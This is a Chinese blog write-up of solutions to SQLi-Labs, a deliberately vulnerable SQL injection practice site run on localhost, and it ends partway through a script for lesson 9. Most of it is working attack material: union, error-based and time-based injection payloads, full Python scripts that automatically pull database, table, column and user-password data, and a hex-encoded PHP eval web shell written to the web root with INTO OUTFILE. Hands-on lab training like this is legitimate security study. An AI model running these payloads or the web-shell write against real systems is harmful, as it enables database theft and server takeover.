SqliLab 题解

Author Avatar
Tr0y 12月 11, 2017 23:04:22 本文共 16.6k 字
  • 文为知己者书
  • 在其它设备中阅读本文章

SqliLab 每日一注

介绍

SQLI-LABS 是一个 SQL 注入练习平台, 包含了基础的 sql 注入案例,挺好玩的
项目地址在这

安装

将源代码复制到 Apache webroot 文件夹(htddocs,/var/www)
打开 sql-connections 文件夹下的”db-creds.inc”文件
修改 mysql 用户名和密码为你自己的
打开浏览器,通过 localhost 的 index.html 访问文件夹
点击 setup/resetDB 就会在你的 mysql 中创造数据库
开始日站咯

Day1-Less1

分析

select *,* from XX where id = '$id' LIMIT 0,1
select *,* from XX where id = '' or 1=1 limit 1,2--+' LIMIT 0,1
http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 3,4 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+


数据库版本: @@version
查看 MySQL 的当前用户 USER()
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES


select *,* from XX where id = '

' LIMIT 0,1

http://localhost/sqllab/Less-1/?id=' or 1=(SELECT length(TABLE_NAME FROM) INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 0,1) --+

记录一下技巧
select group_concat(username) from users;
(sleep(ascii(mid(user()from(2)for(1)))=109))

比如在 mysql 中我们可以使用如下的经典语句进行报错。
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

这是网上流传很广的一个版本,可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2));

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其实这是 mysql 的一个 bug 所引起的,其他数据库都不会因为这个问题而报错。

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day2-Less2

分析

select *,* from XX where id = $id LIMIT 0,1

select *,* from XX where id = 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+ LIMIT 0,1
http://localhost/sqllab/Less-1/?id= 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+


代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=0 or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-2/?id=0 or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day3-Less3

分析

select *,* from XX where id = '($id)' LIMIT 0,1
select *,* from XX where id = ('$id') LIMIT 0,1

select *,* from XX where id = '(1)' LIMIT 0,1
select *,* from XX where id = '()' --+)' LIMIT 0,1
select *,* from XX where id = ('1') --+') LIMIT 0,1

select *,* from XX where id = ('
1') or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=0') or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-3/?id=0') or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day4-Less4

分析

select *,* from XX where id = "($id)" LIMIT 0,1
select *,* from XX where id = ("$id") LIMIT 0,1

select *,* from XX where id = ("") LIMIT 0,1

select *,* from XX where id = ("
1") or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

Day5-Less5

分析

select *,* from XX where id = '$id' LIMIT 0,1

select *,* from XX where id = '1' order by 3--+' LIMIT 0,1
3 列

' or 0 union all SELECT 0,1,2 FROM k--+
库名 security

concat(user(),floor(rand(0)*2))

select *,* from XX where id='
' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_NAME limit 102,1))) --+
' LIMIT 0,1

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA limit 1,1)))

 where extractvalue(1,concat('*',(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='security' limit 2,1),'*'));

 http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))) --+
 遍历 0 即可
(extractvalue 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) --+
(updatexml 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

或者
http://localhost/sqllab/Less-5/?id=' or 1 group by concat_ws('*',(select username from security.users limit 0,1),(select password from security.users limit 0,1),floor(rand(0)*2)) having min(0) --+

或者
http://localhost/sqllab/Less-5/?id=' union select (concat_ws('*', (select username from security.users limit 0,1),(select password from security.users limit 0,1), floor(rand(0)*2))), count(*), 3 from security.users group by 1 --+

Day6-Less6

分析

select *,* from XX where id = "$id" LIMIT 0,1

同 5
http://localhost/sqllab/Less-6/?id=" union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

Day7-Less7

分析

select *,* from XX where id = (('$id')) LIMIT 0,1

http://localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt" --+

select id,username,password from users where id = (('
')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt"; --+
')) LIMIT 0,1

localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "1.txt"; --+

')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "/weshell.php" --+
')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "D:\\wamp\\www\\weshell.php" --+

由于没有返回值,php 没法取到,在源码的逻辑下会报错

Day8-Less8

分析

同 5

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day9-Less9

分析

' or 1 union select 1,2,sleep(2) --+

0' or length(database())=8 --+
1' and length(database())=8 and sleep(2)--+

代码

from requests import get
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and length(database())=%d  and sleep(2)--+" %i)
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+" %(name,n,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
